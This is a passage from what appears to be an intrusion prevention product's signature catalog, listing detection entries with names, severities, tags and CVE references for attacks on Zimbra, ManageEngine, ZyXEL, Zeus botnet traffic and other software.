First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Zeus-Web-Server-File-Read-Vulnerability
Description:
Back to top

HTTP_CSU-Zeus-Zbot-Botnet-Checkin

About this situation: Zeus/Zbot based botnet checkin
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-288-4219
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CSU-Zeus-Zbot-Botnet-Update

About this situation: Zeus/Zbot based botnet configuration download
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-288-4219
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CSU-Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
Description:
Back to top

HTTP_CSU-Zimbra-Collaboration-Cross-Site-Scripting-CVE-2022-27926

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Zimbra-Collaboration-Cross-Site-Scripting-CVE-2022-27926
Description:
Back to top

HTTP_CSU-Zimbra-Collaboration-Memcached-Command-Injection-In-Path-CVE-2022-27924

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1490-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Zimbra-Collaboration-Memcached-Command-Injection-CVE-2022-27924
Description: CVE References: CVE-2022-27924
Back to top

HTTP_CSU-Zimbra-Collaboration-Memcached-Command-Injection-In-Query-CVE-2022-27924

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Zimbra-Collaboration-Memcached-Command-Injection-CVE-2022-27924
Description: CVE References: CVE-2022-27924
Back to top

HTTP_CSU-Zimbra-Collaboration-Proxy-Servlet-SSRF-CVE-2024-45518

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Zimbra-Collaboration-Proxy-Servlet-SSRF-CVE-2024-45518
Description:
Back to top

HTTP_CSU-Zimbra-Collaboration-Server-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Server detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Zimbra-Collaboration-Server-Local-File-Inclusion
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADSelfService Plus detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADSelfService Plus, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Applications-Manager-Masrequestprocessor-Serverid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation Manageengine Application Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1198-5242
Vulnerability: Zoho-Manageengine-AppManager-Masrequestprocessor-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Desktop Central detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Desktop Central, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1486-5242
Vulnerability: Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Network-Configuration-Manager-Ping-Command-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Network Configuration Manager detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Network Configuration Manager, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Zoho-Manageengine-Network-Configuration-Manager-Ping-Command-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-CVE-2022-29535-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine OpManager detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, ManageEngine OpManager, CVE2022, Windows not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Zoho-Manageengine-Opmanager-CVE-2022-29535-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-Failoverhelperservlet-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: Zoho-Manageengine-Opmanager-Failoverhelperservlet-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Zoho-Manageengine-Opmanager-Fluidicv2-UI-Directory-Traversal
Zoho-Manageengine-Opmanager-Cachestart-Directory-Traversal
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-Getdatacollectionfailurereason-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: Zoho-Manageengine-Opmanager-Getdatacollectionfailurereason-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-Getgraphdata-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Zoho-Manageengine-Opmanager-Getgraphdata-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-Inventory-Reports-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine OpManager detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, ManageEngine OpManager, CVE2022, Windows not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Zoho-Manageengine-Opmanager-Inventory-Reports-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanager-Opmdevicedetailsservlet-Category-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1200-5242
Vulnerability: Zoho-Manageengine-Opmanager-Opmdevicedetailsservlet-Category-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Opmanagerdbutil-Getprobenatdetails-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Zoho-Manageengine-Opmanagerdbutil-Getprobenatdetails-SQL-Injection
Description:
Back to top

HTTP_CSU-Zoho-Manageengine-Password-Manager-Pro-GetVaraibleController-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Password Manager Pro detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Access Manager Plus, Zoho Corporation ManageEngine PAM360, Zoho Corporation ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection
Description:
Back to top

HTTP_CSU-ZyXEL-Chained-RCE-Using-LFI-And-Weak-Password-Derivation-Algorithm

About this situation: An attempt to exploit a vulnerability in ZyXEL routers detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, ZyXEL, CVE2023, Unix not specific, Linux not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: ZyXEL-Chained-RCE-Using-LFI-And-Weak-Password-Derivation-Algorithm
Description:
Back to top

HTTP_CSU-ZyXEL-NAS-Remote-Code-Execution-CVE-2024-29974

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: ZyXEL-NAS-Remote-Code-Execution-CVE-2024-29974
Description:
Back to top

HTTP_CSU-ZyXEL-Remote-Code-Execution-CVE-2020-9054

About this situation: An attempt to exploit a vulnerability in Zyxel network device detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1228-5242
Vulnerability: ZyXEL-Remote-Code-Execution-CVE-2020-9054
Description:
Back to top

HTTP_CSU-ZyXEL-Unauthenticated-Lan-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in in a Zyxel device detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, ZyXEL, CVE2023, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1717-5242
Last changed: sgpkg-ips-1717-5242
Vulnerability: ZyXEL-Unauthenticated-Lan-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-ZyXEL-ZyWALL-USG-Appliance-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in ZyXEL ZyWALL USG Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL ZyWALL USG Appliance, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: ZyXEL-ZyWALL-USG-Appliance-Authentication-Bypass
Description:
Back to top

HTTP_CSU_2Wire-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a 2Wire Cross-Site Request Forgery vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, 2Wire Router, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: 2Wire-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CSU_Adware.MediaGet-Download-Site

About this situation: A suspicious traffic pattern detected
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Win32.Adware.MediaGet-Botnet
Description:
Back to top

HTTP_CSU_Alcatel-OmniPCX-Enterprise-Remote-Command-Execution

About this situation: An attempt to exploit an Alcatel OmniPCX Enterprise Remote Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Alcatel OmniPCX Enterprise, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1440-5242
Vulnerability: Alcatel-OmniPCX-Enterprise-Remote-Command-Execution
Description:
Back to top

HTTP_CSU_Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Tapestry detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tapestry, CVE2020, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure
Description:
Back to top

HTTP_CSU_Basic-Analysis-And-Security-Engine-File-Include

About this situation: An attempt to exploit a Basic Analysis And Security Engine File Include vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Basic Analysis and Security Engine, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Basic-Analysis-And-Security-Engine-File-Include
Description:
Back to top

HTTP_CSU_Family-Connections-CMS-Remote-Command-Execution

About this situation: An attempt to exploit a Family Connections CMS Remote Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, Family Connection CMS, CVE2011, Linux not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Family-Connections-CMS-Remote-Command-Execution
Description:
Back to top

HTTP_CSU_FreePBX-Remote-Command-Execution

About this situation: An attempt to exploit a FreePBX Remote Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-707-5211
Vulnerability: FreePBX-Remote-Command-Execution
Description:
Back to top

HTTP_CSU_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure

About this situation: An attempt to retrieve configuration files from Ge Fanuc Real Time Portal detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ge Fanuc Real Time Portal, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure
Description:
Back to top

HTTP_CSU_hinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ThinkAdmin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ThinkAdmin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: ThinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal
Description:
Back to top

HTTP_CSU_Jenkins-CVS-Plugin-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Jenkins CVS Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Jenkins-CVS-Plugin-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CSU_Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242

About this situation: An attempt to exploit a vulnerability in JunOS detected
Context: HTTP Request URI
Severity: 7
Tags: Junos OS, Any Hardware, CVE2022, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242
Description:
Back to top

HTTP_CSU_Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080

About this situation: An attempt to exploit a vulnerability in Exchange Server detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2022, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1568-5242
Vulnerability: Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080
Description:
Back to top

HTTP_CSU_MoinMoin-Remote-Code-Execution

About this situation: An attempt to exploit a MoinMoin Remote Code Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MoinMoin, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1640-5242
Vulnerability: MoinMoin-Remote-Code-Execution
Description:
Back to top

HTTP_CSU_Open-Flash-Chart-Remote-PHP-Code-Execution

About this situation: An attempt to exploit an Open Flash Chart Remote PHP Code Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Open Flash Chart, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-723-5211
Vulnerability: Open-Flash-Chart-Remote-PHP-Code-Execution
Description:
Back to top

HTTP_CSU_Pandora-FMS-Authentication-Bypass

About this situation: An attempt to exploit a Pandora FMS Authentication Bypass vulnerability detected.
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Pandora FMS, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Pandora-FMS-Authentication-Bypass
Description:
Back to top

HTTP_CSU_PHP-Cgi-Remote-Code-Execution

About this situation: An attempt to exploit a PHP Cgi Remote Code Execution vulnerability detected.
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, PHP, CVE2012, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1646-5242
Vulnerability: Php-Cgi-Query-String-Information-Disclosure
PHP-Cgi-Remote-Code-Execution
Description:
Back to top

HTTP_CSU_Phpmyadmin-Server_sync.php-Backdoor

About this situation: An attempt to exploit a phpMyAdmin server_sync.php Backdoor vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Phpmyadmin-Server_sync.php-Backdoor
Description:
Back to top

HTTP_CSU_Pi3Web-ISAPI-Denial-of-Service

About this situation: An attempt to exploit a Pi3Web ISAPI Denial of Service vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, John Roy Pi3Web, CVE2008, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-726-5211
Vulnerability: Pi3Web-ISAPI-Denial-of-Service
Description:
Back to top

HTTP_CSU_Redmine-Bazaar-Repository-Adapter-Command-Execution

About this situation: An attempt to exploit a Redmine Bazaar Repository Adapter Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Redmine, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Redmine-Bazaar-Repository-Adapter-Command-Execution
Description:
Back to top

HTTP_CSU_Rompager-Rom0-Information-Disclosure

About this situation: An attack against Rompager Embedded Web Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Allegro Rompager Web Server, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: Rompager-Rom0-Information-Disclosure
Description:
Back to top

HTTP_CSU_SAP-Netweaver-As-Java-CRM-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA CRM detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: SAP-Netweaver-As-Java-CRM-Remote-Code-Execution
Description:
Back to top

HTTP_CSU_SHTTPD-POST-Request-Buffer-Overflow

About this situation: An attempt to exploit an SHTTPD POST Request Buffer Overflow vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, SHTTPD, CVE2006, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-732-5211
Vulnerability: SHTTPD-POST-Request-Buffer-Overflow
Description:
Back to top

HTTP_CSU_TYPO3-File-Disclosure

About this situation: An attempt to exploit a TYPO3 File Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, TYPO3, CVE2009, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-729-5211
Vulnerability: TYPO3-File-Disclosure
Description:
Back to top

HTTP_CSU_VMware-Vcenter-Update-Manager-Directory-Traversal

About this situation: An attempt to exploit a VMware Vcenter Update Manager Directory Traversal vulnerability detected.
